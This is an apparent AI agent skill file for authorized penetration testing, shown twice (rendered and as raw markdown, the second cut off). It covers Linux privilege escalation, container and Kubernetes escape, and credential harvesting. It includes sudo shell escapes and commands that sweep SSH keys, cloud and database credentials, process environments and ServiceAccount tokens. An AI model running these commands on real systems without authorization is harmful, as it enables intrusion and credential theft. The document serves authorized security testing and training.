Lockpick: Privilege Escalation & Post-Exploitation Assessment
Systematic privilege escalation methodology for authorized security assessments, CTF
challenges, and penetration testing engagements. Covers Linux systems, containers, Kubernetes
clusters, VPN infrastructure, and IaC credential exposure.
This skill is offensive - it assumes you have initial access and guides escalation to higher
privileges. For defensive hardening and vulnerability scanning, use the security-audit skill
instead.
When to use
- Authorized penetration testing engagements (with written scope)
- CTF challenges and security training labs (HTB, THM, PG, etc.)
- Post-exploitation enumeration after gaining initial shell access
- Red team exercises with defined rules of engagement
- Assessing your own infrastructure for privilege escalation paths
- Container escape and Kubernetes RBAC abuse testing
- VPN credential extraction and lateral movement assessment
When NOT to use
- Defensive security reviews or hardening (use security-audit)
- Application code vulnerability scanning / SAST (use security-audit)
- VPN setup, configuration, or troubleshooting (use networking)
- Firewall rule auditing (use firewall-appliance)
- Docker image hardening or Dockerfile review (use docker)
- Kubernetes manifest security review (use kubernetes)
- CI/CD pipeline security (use ci-cd)
- Without written authorization from the system owner
AI Self-Check
Before executing any technique or generating exploitation commands, verify:
Performance
- Run low-noise enumeration first; expensive scanners and brute-force tools require scope and rate limits.
- Capture command output as you go so repeated enumeration is unnecessary.
- Prioritize likely local privesc paths from kernel, sudo, SUID, services, containers, and writable paths before broad tool dumps.
Best Practices
- Keep CTF shortcuts out of real pentest guidance unless the user says it is a CTF.
- Document exact preconditions and proof for every privilege boundary crossed.
- Do not install persistence or cleanup evidence unless the engagement explicitly requires and authorizes it.
Workflow
Phase 1: Situational Awareness
Determine what you're working with before trying anything.
# Who am I, what can I do?
id && hostname && uname -a && cat /etc/*-release 2>/dev/null
# Am I in a container?
cat /proc/1/cgroup 2>/dev/null | grep -qiE 'docker|kubepods|containerd' && echo "CONTAINER" || echo "HOST"
ls -la /.dockerenv 2>/dev/null && echo "Docker container detected"
cat /proc/self/mountinfo | grep -q 'kubepods' && echo "Kubernetes pod detected"
# What's the network look like?
ip addr && ip route && ss -tulpn
Decision tree:
- Bare metal / VM -> Phase 2 (Linux privesc)
- Docker container -> Phase 5 (container breakout)
- Kubernetes pod -> Phase 6 (k8s privesc)
- Any of the above -> also check Phase 7 (VPN/secrets) and Phase 8 (IaC)
Phase 2: Linux Privilege Escalation
Core Linux privesc methodology. Start with automated enumeration, then work through
manual techniques.
Sudo GTFOBins quick-reference (top-5 CTF patterns, inline):
sudo vim -> :!bash (or :set shell=/bin/bash :shell)
sudo less -> !bash
sudo find -> sudo find / -name x -exec /bin/bash \;
sudo awk -> sudo awk 'BEGIN {system("/bin/bash")}'
sudo nmap -> sudo nmap --interactive (then !sh) [older nmap only]
Run sudo -l first - if any of these appear, escalation is one command away.
Read references/linux-privesc.md for the full technique library
covering:
- Automated enumeration - LinPEAS, pspy, Linux Exploit Suggester
- Sudo abuse -
sudo -l misconfigs, GTFOBins, LD_PRELOAD, env_keep
- SUID/SGID binaries - find + exploit via GTFOBins
- Linux capabilities -
getcap, cap_setuid, cap_dac_read_search
- Cron jobs - writable scripts, PATH hijacking in cron context
- Kernel exploits - version-matched CVEs (Dirty Pipe, nf_tables, io_uring, OverlayFS; 2026: Copy Fail CVE-2026-31431 [CISA KEV, exploited], Dirty Frag CVE-2026-43284/43500, Fragnesia CVE-2026-46300 [ESP-in-TCP, exploited], ptrace CVE-2026-46333)
- PATH hijacking - SUID binaries calling relative commands
- NFS - no_root_squash exploitation
- Writable files - /etc/passwd, /etc/shadow, authorized_keys, systemd units
- Wildcard injection - tar, chown, rsync with wildcards in cron/scripts
Priority order: sudo > SUID > capabilities > cron > writable files > kernel exploits.
Kernel exploits are last resort - they can crash the system.
Phase 3: Credential Harvesting
After initial enumeration, sweep for credentials before escalating.
# History files
cat ~/.bash_history ~/.zsh_history ~/.mysql_history 2>/dev/null
# Config files with passwords
grep -rils 'password\|passwd\|pass\|secret\|token\|key\|api' \
/etc/ /opt/ /var/ /home/ /root/ 2>/dev/null | head -30
# SSH keys
find / -name 'id_rsa' -o -name 'id_ed25519' -o -name 'id_ecdsa' \
-o -name '*.pem' -o -name '*.key' 2>/dev/null
# Database credentials
cat /etc/mysql/debian.cnf 2>/dev/null
cat /var/www/*/wp-config.php 2>/dev/null
grep -r 'DATABASE_URL\|DB_PASS\|POSTGRES_PASSWORD' /opt/ /srv/ /var/ 2>/dev/null
# Cloud credentials
cat ~/.aws/credentials ~/.config/gcloud/credentials.db 2>/dev/null
env | grep -iE 'aws|azure|gcp|cloud|token|key|secret|pass'
# Process memory (credentials in running services)
# Read environ of interesting processes (web servers, databases, agents)
for pid in $(pgrep -f 'nginx\|apache\|postgres\|mysql\|node\|python\|java' 2>/dev/null); do
echo "=== PID $pid ($(cat /proc/$pid/cmdline 2>/dev/null | tr '\0' ' ')) ==="
cat /proc/$pid/environ 2>/dev/null | tr '\0' '\n' | grep -iE 'pass|secret|token|key|dsn|database_url'
done
Phase 4: VPN & Tunnel Credential Extraction
Check for VPN configurations that reveal keys, topology, or credentials for lateral movement.
Read references/vpn-iac-secrets.md for the full technique library
covering:
- WireGuard -
/etc/wireguard/*.conf private key extraction, peer topology mapping, AllowedIPs as network map, PreUp/PostUp script injection
- OpenVPN -
.ovpn embedded certs/keys, auth-user-pass credential files, management interface abuse (port 7505), plugin loading (CVE-2024-27903 chain)
- IPsec -
/etc/ipsec.secrets PSK/RSA extraction, ike-scan aggressive mode hash capture + offline cracking, swanctl credential theft
- SSH agent hijacking -
SSH_AUTH_SOCK socket theft from other users, key injection, tunnel pivoting (-L, -R, -D)
Phase 5: Container Breakout
If you're inside a container, look for escape vectors. The --privileged flag is the critical enabler - it disables all security mechanisms (seccomp, AppArmor, capability drops, device cgroup) and grants full access to host devices. A privileged container is effectively root on the host.
Read references/container-breakout.md for the full technique library
covering:
- Docker socket - mounted
/var/run/docker.sock -> full host access
- Privileged mode -
--privileged -> mount host filesystems, load kernel modules
- Dangerous capabilities - SYS_ADMIN (cgroup escape), SYS_PTRACE (process injection), DAC_READ_SEARCH (shocker), SYS_MODULE
- Host mounts -
/host, /mnt, or host paths mounted into container
- Docker group - user in
docker group = effective root
- Runtime CVEs - runc (CVE-2024-21626 Leaky Vessels), containerd, BuildKit
- cgroup escape - v1 release_agent abuse (CVE-2022-0492), notify_on_release
- Namespace escape - nsenter, /proc/1/root, user namespace breakout
Quick check:
# Am I privileged?
ip link add dummy0 type dummy 2>/dev/null && echo "PRIVILEGED" && ip link del dummy0
# Docker socket?
ls -la /var/run/docker.sock 2>/dev/null
# Capabilities?
cat /proc/self/status | grep -i capeff
# capsh if available
capsh --print 2>/dev/null
# Host mount?
mount | grep -E '^/dev/' | grep -v 'overlay'
Phase 6: Kubernetes Privilege Escalation
If you're inside a k8s pod or have access to a kubeconfig.
Read references/kubernetes-privesc.md for the full technique library
covering:
- ServiceAccount token - auto-mounted at
/var/run/secrets/kubernetes.io/serviceaccount/, API access, token scoping (pre/post 1.24)
- RBAC abuse - wildcard permissions, escalate/bind verbs, create pods + get secrets, impersonation
- Pod creation - schedule privileged pods, hostPath mounts, node selectors
- etcd direct access - default port 2379, client cert theft, secret extraction
- Kubelet API - anonymous auth on 10250, exec into any pod, node-level access
- Node-to-cluster - kubeconfig files, static pod manifests, CNI creds, cloud IMDS
- Pod Security bypass - namespace label manipulation, admission controller gaps
Quick check from inside a pod:
# ServiceAccount token
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null)
APISERVER="https://kubernetes.default.svc"
# What can I do?
curl -sk "$APISERVER/apis" -H "Authorization: Bearer $TOKEN" | head -20
# Can I list secrets?
curl -sk "$APISERVER/api/v1/secrets" -H "Authorization: Bearer $TOKEN"
# Can I create pods?
curl -sk "$APISERVER/api/v1/namespaces/default/pods" \
-H "Authorization: Bearer $TOKEN" -X POST -H "Content-Type: application/json" \
-d '{}' 2>&1 | grep -o '"message":"[^"]*"'
Phase 7: IaC & Cloud Credential Exposure
Sweep the filesystem for infrastructure-as-code secrets.
Read references/vpn-iac-secrets.md (IaC Secrets section) for the full
technique library covering:
- Terraform -
terraform.tfstate contains plaintext secrets, .terraform/ provider creds, TF_VAR_* env vars, remote state backend credentials
- Ansible - vault cracking (
ansible2john + hashcat -m 16900), plaintext group_vars/, vault password files, inventory SSH keys
- Cloud IMDS - AWS
169.254.169.254, GCP metadata.google.internal, Azure metadata headers, IMDSv2 bypass, Kubernetes pod-to-IMDS access
- kubeconfig files -
~/.kube/config, /etc/kubernetes/admin.conf, embedded certs/tokens
- Sealed Secrets - controller private key = decrypt everything
- CI/CD credentials -
.env files, runner tokens, registry credentials
Phase 8: Lateral Movement & Pivoting
Once you've escalated, pivot to other systems.
Read references/shells-and-pivoting.md for:
- Reverse shells - bash, python, perl, netcat, php, ruby, powershell
- SSH tunneling - local forwarding (-L), remote forwarding (-R), dynamic SOCKS (-D), ProxyJump chains
- SSH agent hijacking - stealing SSH_AUTH_SOCK from other users for key reuse
- Port forwarding - chisel, ligolo-ng, socat, SSH as SOCKS proxy
- Internal network scanning - quick TCP sweep without nmap
- File transfer - curl, wget, nc, python http.server, base64 encoding
Enumeration Quick Reference
| Vector |
Command |
| Kernel version |
uname -r |
| Current user |
id |
| Sudo rights |
sudo -l |
| SUID binaries |
find / -perm -u=s -type f 2>/dev/null |
| SGID binaries |
find / -perm -g=s -type f 2>/dev/null |
| Capabilities |
getcap -r / 2>/dev/null |
| Cron jobs |
cat /etc/crontab; ls -la /etc/cron.* |
| Cron (live) |
pspy (no root needed, watches /proc) |
| Writable dirs |
find / -writable -type d 2>/dev/null |
| Writable files |
find /etc -writable -type f 2>/dev/null |
| NFS exports |
cat /etc/exports |
| WireGuard |
ls /etc/wireguard/; wg show 2>/dev/null |
| OpenVPN |
find / -name '*.ovpn' 2>/dev/null |
| IPsec secrets |
cat /etc/ipsec.secrets 2>/dev/null |
| SSH keys |
find / -name 'id_*' -o -name '*.pem' 2>/dev/null |
| Docker socket |
ls -la /var/run/docker.sock 2>/dev/null |
| K8s SA token |
cat /var/run/secrets/kubernetes.io/serviceaccount/token |
| Container? |
cat /proc/1/cgroup 2>/dev/null | grep -qiE docker|kube |
| Cloud IMDS |
curl -s http://169.254.169.254/latest/meta-data/ 2>/dev/null |
| Terraform state |
find / -name 'terraform.tfstate*' 2>/dev/null |
| Ansible vault |
grep -rl '\$ANSIBLE_VAULT' / 2>/dev/null |
Tools
| Tool |
Purpose |
Source |
| LinPEAS |
Automated Linux enumeration |
PEASS-ng |
| pspy |
Process snooping without root |
pspy |
| Linux Exploit Suggester |
Kernel exploit matching |
les |
| GTFOBins |
SUID/sudo/cap binary abuse |
gtfobins.github.io |
| CDK |
Container/K8s pentest toolkit |
CDK |
| deepce |
Docker enumeration/escape |
deepce |
| kubectl-who-can |
RBAC permission checker |
kubectl-who-can |
| kube-hunter |
K8s cluster vulnerability scan |
kube-hunter |
| Peirates |
K8s pentest tool |
peirates |
| kubeletctl |
Kubelet API interaction |
kubeletctl |
| ike-scan |
IKE/IPsec enumeration + PSK capture |
ike-scan |
| chisel |
TCP/UDP tunnel over HTTP |
chisel |
| ligolo-ng |
Tunneling with TUN interface |
ligolo-ng |
Reference Files
references/linux-privesc.md - core Linux privesc techniques (sudo, SUID, cron, capabilities, kernel exploits, PATH hijack, NFS, wildcards)
references/container-breakout.md - Docker and container escape techniques (socket, privileged, capabilities, cgroups, runtime CVEs)
references/kubernetes-privesc.md - Kubernetes RBAC abuse, ServiceAccount exploitation, etcd, kubelet, pod creation, PSS bypass
references/vpn-iac-secrets.md - VPN credential extraction (WireGuard, OpenVPN, IPsec) and IaC secrets exposure (Terraform, Ansible, cloud IMDS)
references/shells-and-pivoting.md - reverse shells, SSH tunneling, agent hijacking, port forwarding, file transfer
Scope Boundaries
Windows targets: This skill covers Linux, containers, and Kubernetes. Windows privilege escalation (token impersonation, SeImpersonatePrivilege, PrintSpoofer, AD abuse, Kerberoasting) is a separate domain not covered here. For Windows CTF/pentest, research Windows-specific tooling (WinPEAS, PowerUp, Rubeus, BloodHound) directly.
Evidence Capture Template
Rule 4 says document everything. Use this structure per finding:
## Finding: [short name]
- **Vector**: [sudo/SUID/cron/container/k8s/kernel/etc.]
- **Access before**: [user/group, e.g., www-data]
- **Access after**: [user/group, e.g., root]
- **Steps**: [numbered list of exact commands run]
- **Proof**: [command output showing escalated access, e.g., id, whoami, cat /root/proof.txt]
- **Cleanup**: [files created, users added, configs changed - and how to reverse]
- **Remediation**: [what the defender should fix]
Capture script -q /tmp/session.log at the start of each engagement to get a full terminal transcript.
Output Contract
See references/output-contract.md for the full contract.
- Skill name: LOCKPICK
- Deliverable bucket:
audits
- Mode: conditional. When invoked to analyze, review, audit, or improve existing repo content, emit the full contract - monospace inline header, severity-grouped inline summary, linked Markdown deliverable, and concise monospace conclusion - and write the deliverable to
docs/local/audits/lockpick/<YYYY-MM-DD>-<slug>.md. When invoked to answer a question, teach a concept, build a new artifact, or generate content, respond freely without the contract.
- Severity scale:
P0 | P1 | P2 | P3 | info (see shared contract; only used in audit/review mode).
Related Skills
- security-audit - defensive counterpart. Finds vulnerabilities through SAST, dependency scanning, and config review. This skill exploits them. Use security-audit for hardening; use lockpick for proving exploitability.
- networking - configures and troubleshoots VPNs, DNS, proxies, firewalls. Lockpick's VPN section extracts credentials and keys from existing configs for lateral movement. Use networking for setup; use lockpick for exploitation.
- kubernetes - writes and reviews k8s manifests and Helm charts. Lockpick's k8s section attacks the cluster from inside a compromised pod. Use kubernetes for building; use lockpick for breaking.
- docker - Dockerfile and Compose authoring. Lockpick's container section escapes from running containers. Use docker for building images; use lockpick for escaping them.
- firewall-appliance - OPNsense/pfSense firewall management. Lockpick doesn't cover network-level firewall testing.
- ansible - playbook and role authoring. Lockpick's IaC section targets Ansible vault cracking and credential extraction, not playbook writing.
- terraform - IaC authoring. Lockpick's IaC section targets state file secret extraction, not Terraform module design.
Rules
- Authorization is non-negotiable. Every technique requires written authorization or a CTF/lab context. No exceptions, no "it's my own box" without explicit confirmation.
- Enumerate before exploiting. Run through the full enumeration checklist before attempting kernel exploits or destructive techniques. The easy wins (sudo, SUID, cron) are safer and more reliable.
- Kernel exploits are last resort. They can crash the system, corrupt memory, or trigger panic. Try everything else first. Test in a lab environment when possible.
- Document everything. Capture command output before moving to the next technique. Evidence of the escalation path is the deliverable, not just root access.
- Clean up after yourself. Track files created, users added, configs modified. Remove them at the end of the engagement or note them for the client.
- Don't access unnecessary data. Proving root access doesn't require reading actual user data. A
whoami or /root/proof.txt is enough.
- Stay in scope. Lateral movement to systems outside the authorized boundary is out of scope unless explicitly permitted.
- Prefer living off the land. Use tools already on the system before uploading custom binaries. Less forensic footprint, fewer detection triggers.
1---2name: lockpick3description: · Handle authorized privesc, CTFs, post-exploitation on Linux, containers, K8s. Triggers: 'privesc', 'CTF', 'pentest', 'post-exploitation', 'container escape', 'SUID', 'GTFOBins'. Not for hardening (use security-audit).4license: MIT5---67# Lockpick: Privilege Escalation & Post-Exploitation Assessment89Systematic privilege escalation methodology for authorized security assessments, CTF10challenges, and penetration testing engagements. Covers Linux systems, containers, Kubernetes11clusters, VPN infrastructure, and IaC credential exposure.1213This skill is offensive - it assumes you have initial access and guides escalation to higher14privileges. For defensive hardening and vulnerability scanning, use the **security-audit** skill15instead.1617## When to use1819- Authorized penetration testing engagements (with written scope)20- CTF challenges and security training labs (HTB, THM, PG, etc.)21- Post-exploitation enumeration after gaining initial shell access22- Red team exercises with defined rules of engagement23- Assessing your own infrastructure for privilege escalation paths24- Container escape and Kubernetes RBAC abuse testing25- VPN credential extraction and lateral movement assessment2627## When NOT to use2829- Defensive security reviews or hardening (use **security-audit**)30- Application code vulnerability scanning / SAST (use **security-audit**)31- VPN setup, configuration, or troubleshooting (use **networking**)32- Firewall rule auditing (use **firewall-appliance**)33- Docker image hardening or Dockerfile review (use **docker**)34- Kubernetes manifest security review (use **kubernetes**)35- CI/CD pipeline security (use **ci-cd**)36- Without written authorization from the system owner3738---3940## AI Self-Check4142Before executing any technique or generating exploitation commands, verify:4344- [ ] **Authorization confirmed**: written scope document or CTF/lab context established45- [ ] **Target in scope**: IP/hostname/namespace is within the authorized boundary46- [ ] **No production data access**: avoid reading actual user data beyond what's needed to prove access47- [ ] **Evidence captured**: command output logged for the report before moving on48- [ ] **Cleanup planned**: any files dropped, users created, or configs modified are tracked for removal49- [ ] **No destructive actions**: kernel exploits tested in lab first, no `rm -rf`, no disk writes to critical paths50- [ ] **Architecture matched**: exploit/payload matches target arch (`uname -m`). x86_64 exploits don't work on ARM, 32-bit payloads fail on 64-bit-only systems51- [ ] **Reverse shells use authorized ports**: listener IP and port match the engagement plan52- [ ] Cross-cutting agent hygiene applied - see `references/agent-hygiene.md`5354---5556## Performance5758- Run low-noise enumeration first; expensive scanners and brute-force tools require scope and rate limits.59- Capture command output as you go so repeated enumeration is unnecessary.60- Prioritize likely local privesc paths from kernel, sudo, SUID, services, containers, and writable paths before broad tool dumps.616263---6465## Best Practices6667- Keep CTF shortcuts out of real pentest guidance unless the user says it is a CTF.68- Document exact preconditions and proof for every privilege boundary crossed.69- Do not install persistence or cleanup evidence unless the engagement explicitly requires and authorizes it.707172## Workflow7374### Phase 1: Situational Awareness7576Determine what you're working with before trying anything.7778```bash79# Who am I, what can I do?80id && hostname && uname -a && cat /etc/*-release 2>/dev/null8182# Am I in a container?83cat /proc/1/cgroup 2>/dev/null | grep -qiE 'docker|kubepods|containerd' && echo "CONTAINER" || echo "HOST"84ls -la /.dockerenv 2>/dev/null && echo "Docker container detected"85cat /proc/self/mountinfo | grep -q 'kubepods' && echo "Kubernetes pod detected"8687# What's the network look like?88ip addr && ip route && ss -tulpn89```9091**Decision tree:**92- **Bare metal / VM** -> Phase 2 (Linux privesc)93- **Docker container** -> Phase 5 (container breakout)94- **Kubernetes pod** -> Phase 6 (k8s privesc)95- **Any of the above** -> also check Phase 7 (VPN/secrets) and Phase 8 (IaC)9697### Phase 2: Linux Privilege Escalation9899Core Linux privesc methodology. Start with automated enumeration, then work through100manual techniques.101102**Sudo GTFOBins quick-reference** (top-5 CTF patterns, inline):103```104sudo vim -> :!bash (or :set shell=/bin/bash :shell)105sudo less -> !bash106sudo find -> sudo find / -name x -exec /bin/bash \;107sudo awk -> sudo awk 'BEGIN {system("/bin/bash")}'108sudo nmap -> sudo nmap --interactive (then !sh) [older nmap only]109```110Run `sudo -l` first - if any of these appear, escalation is one command away.111112Read `references/linux-privesc.md` for the full technique library113covering:1141151. **Automated enumeration** - LinPEAS, pspy, Linux Exploit Suggester1162. **Sudo abuse** - `sudo -l` misconfigs, GTFOBins, LD_PRELOAD, env_keep1173. **SUID/SGID binaries** - find + exploit via GTFOBins1184. **Linux capabilities** - `getcap`, cap_setuid, cap_dac_read_search1195. **Cron jobs** - writable scripts, PATH hijacking in cron context1206. **Kernel exploits** - version-matched CVEs (Dirty Pipe, nf_tables, io_uring, OverlayFS; 2026: Copy Fail CVE-2026-31431 [CISA KEV, exploited], Dirty Frag CVE-2026-43284/43500, Fragnesia CVE-2026-46300 [ESP-in-TCP, exploited], ptrace CVE-2026-46333)1217. **PATH hijacking** - SUID binaries calling relative commands1228. **NFS** - no_root_squash exploitation1239. **Writable files** - /etc/passwd, /etc/shadow, authorized_keys, systemd units12410. **Wildcard injection** - tar, chown, rsync with wildcards in cron/scripts125126**Priority order**: sudo > SUID > capabilities > cron > writable files > kernel exploits.127Kernel exploits are last resort - they can crash the system.128129### Phase 3: Credential Harvesting130131After initial enumeration, sweep for credentials before escalating.132133```bash134# History files135cat ~/.bash_history ~/.zsh_history ~/.mysql_history 2>/dev/null136137# Config files with passwords138grep -rils 'password\|passwd\|pass\|secret\|token\|key\|api' \139 /etc/ /opt/ /var/ /home/ /root/ 2>/dev/null | head -30140141# SSH keys142find / -name 'id_rsa' -o -name 'id_ed25519' -o -name 'id_ecdsa' \143 -o -name '*.pem' -o -name '*.key' 2>/dev/null144145# Database credentials146cat /etc/mysql/debian.cnf 2>/dev/null147cat /var/www/*/wp-config.php 2>/dev/null148grep -r 'DATABASE_URL\|DB_PASS\|POSTGRES_PASSWORD' /opt/ /srv/ /var/ 2>/dev/null149150# Cloud credentials151cat ~/.aws/credentials ~/.config/gcloud/credentials.db 2>/dev/null152env | grep -iE 'aws|azure|gcp|cloud|token|key|secret|pass'153154# Process memory (credentials in running services)155# Read environ of interesting processes (web servers, databases, agents)156for pid in $(pgrep -f 'nginx\|apache\|postgres\|mysql\|node\|python\|java' 2>/dev/null); do157 echo "=== PID $pid ($(cat /proc/$pid/cmdline 2>/dev/null | tr '\0' ' ')) ==="158 cat /proc/$pid/environ 2>/dev/null | tr '\0' '\n' | grep -iE 'pass|secret|token|key|dsn|database_url'159done160```161162### Phase 4: VPN & Tunnel Credential Extraction163164Check for VPN configurations that reveal keys, topology, or credentials for lateral movement.165166Read `references/vpn-iac-secrets.md` for the full technique library167covering:1681691. **WireGuard** - `/etc/wireguard/*.conf` private key extraction, peer topology mapping, AllowedIPs as network map, PreUp/PostUp script injection1702. **OpenVPN** - `.ovpn` embedded certs/keys, `auth-user-pass` credential files, management interface abuse (port 7505), plugin loading (CVE-2024-27903 chain)1713. **IPsec** - `/etc/ipsec.secrets` PSK/RSA extraction, `ike-scan` aggressive mode hash capture + offline cracking, swanctl credential theft1724. **SSH agent hijacking** - `SSH_AUTH_SOCK` socket theft from other users, key injection, tunnel pivoting (`-L`, `-R`, `-D`)173174### Phase 5: Container Breakout175176If you're inside a container, look for escape vectors. **The `--privileged` flag is the critical enabler** - it disables all security mechanisms (seccomp, AppArmor, capability drops, device cgroup) and grants full access to host devices. A privileged container is effectively root on the host.177178Read `references/container-breakout.md` for the full technique library179covering:1801811. **Docker socket** - mounted `/var/run/docker.sock` -> full host access1822. **Privileged mode** - `--privileged` -> mount host filesystems, load kernel modules1833. **Dangerous capabilities** - SYS_ADMIN (cgroup escape), SYS_PTRACE (process injection), DAC_READ_SEARCH (shocker), SYS_MODULE1844. **Host mounts** - `/host`, `/mnt`, or host paths mounted into container1855. **Docker group** - user in `docker` group = effective root1866. **Runtime CVEs** - runc (CVE-2024-21626 Leaky Vessels), containerd, BuildKit1877. **cgroup escape** - v1 release_agent abuse (CVE-2022-0492), notify_on_release1888. **Namespace escape** - nsenter, /proc/1/root, user namespace breakout189190**Quick check:**191```bash192# Am I privileged?193ip link add dummy0 type dummy 2>/dev/null && echo "PRIVILEGED" && ip link del dummy0194# Docker socket?195ls -la /var/run/docker.sock 2>/dev/null196# Capabilities?197cat /proc/self/status | grep -i capeff198# capsh if available199capsh --print 2>/dev/null200# Host mount?201mount | grep -E '^/dev/' | grep -v 'overlay'202```203204### Phase 6: Kubernetes Privilege Escalation205206If you're inside a k8s pod or have access to a kubeconfig.207208Read `references/kubernetes-privesc.md` for the full technique library209covering:2102111. **ServiceAccount token** - auto-mounted at `/var/run/secrets/kubernetes.io/serviceaccount/`, API access, token scoping (pre/post 1.24)2122. **RBAC abuse** - wildcard permissions, escalate/bind verbs, create pods + get secrets, impersonation2133. **Pod creation** - schedule privileged pods, hostPath mounts, node selectors2144. **etcd direct access** - default port 2379, client cert theft, secret extraction2155. **Kubelet API** - anonymous auth on 10250, exec into any pod, node-level access2166. **Node-to-cluster** - kubeconfig files, static pod manifests, CNI creds, cloud IMDS2177. **Pod Security bypass** - namespace label manipulation, admission controller gaps218219**Quick check from inside a pod:**220```bash221# ServiceAccount token222TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null)223APISERVER="https://kubernetes.default.svc"224225# What can I do?226curl -sk "$APISERVER/apis" -H "Authorization: Bearer $TOKEN" | head -20227228# Can I list secrets?229curl -sk "$APISERVER/api/v1/secrets" -H "Authorization: Bearer $TOKEN"230231# Can I create pods?232curl -sk "$APISERVER/api/v1/namespaces/default/pods" \233 -H "Authorization: Bearer $TOKEN" -X POST -H "Content-Type: application/json" \234 -d '{}' 2>&1 | grep -o '"message":"[^"]*"'235```236237### Phase 7: IaC & Cloud Credential Exposure238239Sweep the filesystem for infrastructure-as-code secrets.240241Read `references/vpn-iac-secrets.md` (IaC Secrets section) for the full242technique library covering:2432441. **Terraform** - `terraform.tfstate` contains plaintext secrets, `.terraform/` provider creds, `TF_VAR_*` env vars, remote state backend credentials2452. **Ansible** - vault cracking (`ansible2john` + hashcat -m 16900), plaintext `group_vars/`, vault password files, inventory SSH keys2463. **Cloud IMDS** - AWS `169.254.169.254`, GCP `metadata.google.internal`, Azure metadata headers, IMDSv2 bypass, Kubernetes pod-to-IMDS access2474. **kubeconfig files** - `~/.kube/config`, `/etc/kubernetes/admin.conf`, embedded certs/tokens2485. **Sealed Secrets** - controller private key = decrypt everything2496. **CI/CD credentials** - `.env` files, runner tokens, registry credentials250251### Phase 8: Lateral Movement & Pivoting252253Once you've escalated, pivot to other systems.254255Read `references/shells-and-pivoting.md` for:2562571. **Reverse shells** - bash, python, perl, netcat, php, ruby, powershell2582. **SSH tunneling** - local forwarding (-L), remote forwarding (-R), dynamic SOCKS (-D), ProxyJump chains2593. **SSH agent hijacking** - stealing SSH_AUTH_SOCK from other users for key reuse2604. **Port forwarding** - chisel, ligolo-ng, socat, SSH as SOCKS proxy2615. **Internal network scanning** - quick TCP sweep without nmap2626. **File transfer** - curl, wget, nc, python http.server, base64 encoding263264---265266## Enumeration Quick Reference267268| Vector | Command |269|--------|---------|270| Kernel version | `uname -r` |271| Current user | `id` |272| Sudo rights | `sudo -l` |273| SUID binaries | `find / -perm -u=s -type f 2>/dev/null` |274| SGID binaries | `find / -perm -g=s -type f 2>/dev/null` |275| Capabilities | `getcap -r / 2>/dev/null` |276| Cron jobs | `cat /etc/crontab; ls -la /etc/cron.*` |277| Cron (live) | `pspy` (no root needed, watches /proc) |278| Writable dirs | `find / -writable -type d 2>/dev/null` |279| Writable files | `find /etc -writable -type f 2>/dev/null` |280| NFS exports | `cat /etc/exports` |281| WireGuard | `ls /etc/wireguard/; wg show 2>/dev/null` |282| OpenVPN | `find / -name '*.ovpn' 2>/dev/null` |283| IPsec secrets | `cat /etc/ipsec.secrets 2>/dev/null` |284| SSH keys | `find / -name 'id_*' -o -name '*.pem' 2>/dev/null` |285| Docker socket | `ls -la /var/run/docker.sock 2>/dev/null` |286| K8s SA token | `cat /var/run/secrets/kubernetes.io/serviceaccount/token` |287| Container? | `cat /proc/1/cgroup 2>/dev/null \| grep -qiE docker\|kube` |288| Cloud IMDS | `curl -s http://169.254.169.254/latest/meta-data/ 2>/dev/null` |289| Terraform state | `find / -name 'terraform.tfstate*' 2>/dev/null` |290| Ansible vault | `grep -rl '\$ANSIBLE_VAULT' / 2>/dev/null` |291292---293294## Tools295296| Tool | Purpose | Source |297|------|---------|--------|298| LinPEAS | Automated Linux enumeration | [PEASS-ng](https://github.com/peass-ng/PEASS-ng) |299| pspy | Process snooping without root | [pspy](https://github.com/DominicBreuker/pspy) |300| Linux Exploit Suggester | Kernel exploit matching | [les](https://github.com/The-Z-Labs/linux-exploit-suggester) |301| GTFOBins | SUID/sudo/cap binary abuse | [gtfobins.github.io](https://gtfobins.github.io) |302| CDK | Container/K8s pentest toolkit | [CDK](https://github.com/cdk-team/CDK) |303| deepce | Docker enumeration/escape | [deepce](https://github.com/stealthcopter/deepce) |304| kubectl-who-can | RBAC permission checker | [kubectl-who-can](https://github.com/aquasecurity/kubectl-who-can) |305| kube-hunter | K8s cluster vulnerability scan | [kube-hunter](https://github.com/aquasecurity/kube-hunter) |306| Peirates | K8s pentest tool | [peirates](https://github.com/inguardians/peirates) |307| kubeletctl | Kubelet API interaction | [kubeletctl](https://github.com/cyberark/kubeletctl) |308| ike-scan | IKE/IPsec enumeration + PSK capture | [ike-scan](https://github.com/royhills/ike-scan) |309| chisel | TCP/UDP tunnel over HTTP | [chisel](https://github.com/jpillora/chisel) |310| ligolo-ng | Tunneling with TUN interface | [ligolo-ng](https://github.com/nicocha30/ligolo-ng) |311312---313314## Reference Files315316- `references/linux-privesc.md` - core Linux privesc techniques (sudo, SUID, cron, capabilities, kernel exploits, PATH hijack, NFS, wildcards)317- `references/container-breakout.md` - Docker and container escape techniques (socket, privileged, capabilities, cgroups, runtime CVEs)318- `references/kubernetes-privesc.md` - Kubernetes RBAC abuse, ServiceAccount exploitation, etcd, kubelet, pod creation, PSS bypass319- `references/vpn-iac-secrets.md` - VPN credential extraction (WireGuard, OpenVPN, IPsec) and IaC secrets exposure (Terraform, Ansible, cloud IMDS)320- `references/shells-and-pivoting.md` - reverse shells, SSH tunneling, agent hijacking, port forwarding, file transfer321322---323324## Scope Boundaries325326**Windows targets**: This skill covers Linux, containers, and Kubernetes. Windows privilege escalation (token impersonation, SeImpersonatePrivilege, PrintSpoofer, AD abuse, Kerberoasting) is a separate domain not covered here. For Windows CTF/pentest, research Windows-specific tooling (WinPEAS, PowerUp, Rubeus, BloodHound) directly.327328---329330## Evidence Capture Template331332Rule 4 says document everything. Use this structure per finding:333334```335## Finding: [short name]336- **Vector**: [sudo/SUID/cron/container/k8s/kernel/etc.]337- **Access before**: [user/group, e.g., www-data]338- **Access after**: [user/group, e.g., root]339- **Steps**: [numbered list of exact commands run]340- **Proof**: [command output showing escalated access, e.g., id, whoami, cat /root/proof.txt]341- **Cleanup**: [files created, users added, configs changed - and how to reverse]342- **Remediation**: [what the defender should fix]343```344345Capture `script -q /tmp/session.log` at the start of each engagement to get a full terminal transcript.346347---348349## Output Contract350351See `references/output-contract.md` for the full contract.352353- **Skill name:** LOCKPICK354- **Deliverable bucket:** `audits`355- **Mode:** conditional. When invoked to **analyze, review, audit, or improve** existing repo content, emit the full contract - monospace inline header, severity-grouped inline summary, linked Markdown deliverable, and concise monospace conclusion - and write the deliverable to 